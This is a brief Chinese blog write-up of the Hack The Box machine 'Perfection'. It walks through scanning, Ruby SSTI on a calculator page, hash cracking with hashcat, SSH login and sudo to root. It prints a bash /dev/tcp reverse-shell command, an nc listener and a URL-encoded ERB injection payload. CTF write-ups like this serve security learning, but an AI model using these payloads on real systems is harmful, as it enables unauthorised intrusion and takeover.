Hack The Box——Perfection笔记

机器名称:Perfection

难度:easy

首先使用nmap进行扫描可知开启了web服务和ssh服务

访问web网站,找到一个计算页面

 

并且通过信息收集可知,此网站为ruby语言开发,所以尝试ssti注入,发现存在ssti注入

 

我们将payload先进行编码

hURL -B "bash -i >& /dev/tcp/IP/7373 0>&1"

hURL -U "BASE64"

 

开启端口监听nc -lvnp 7373

然后将payload传入获取shell

(此处也可直接抓包输入执行命令进行后续操作,例如KK%0A<%25%3d+`ls`+%25>

成功找到user.txt

通过信息收集可获得susanhash

并且找到了hash原文的组成部分

于是使用hashcat进行爆破得到密码

通过最初的扫描可知ssh服务开启,于是登陆ssh

 

使用sudo su,密码与上面密码相同,然后查看root.txt即可。

 

本文作者:juejuezi

本文链接:https://www.cnblogs.com/juejuezi/p/18127885

版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。

posted @   掘掘子  阅读(42)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示
评论
收藏
关注
推荐
深色
回顶
收起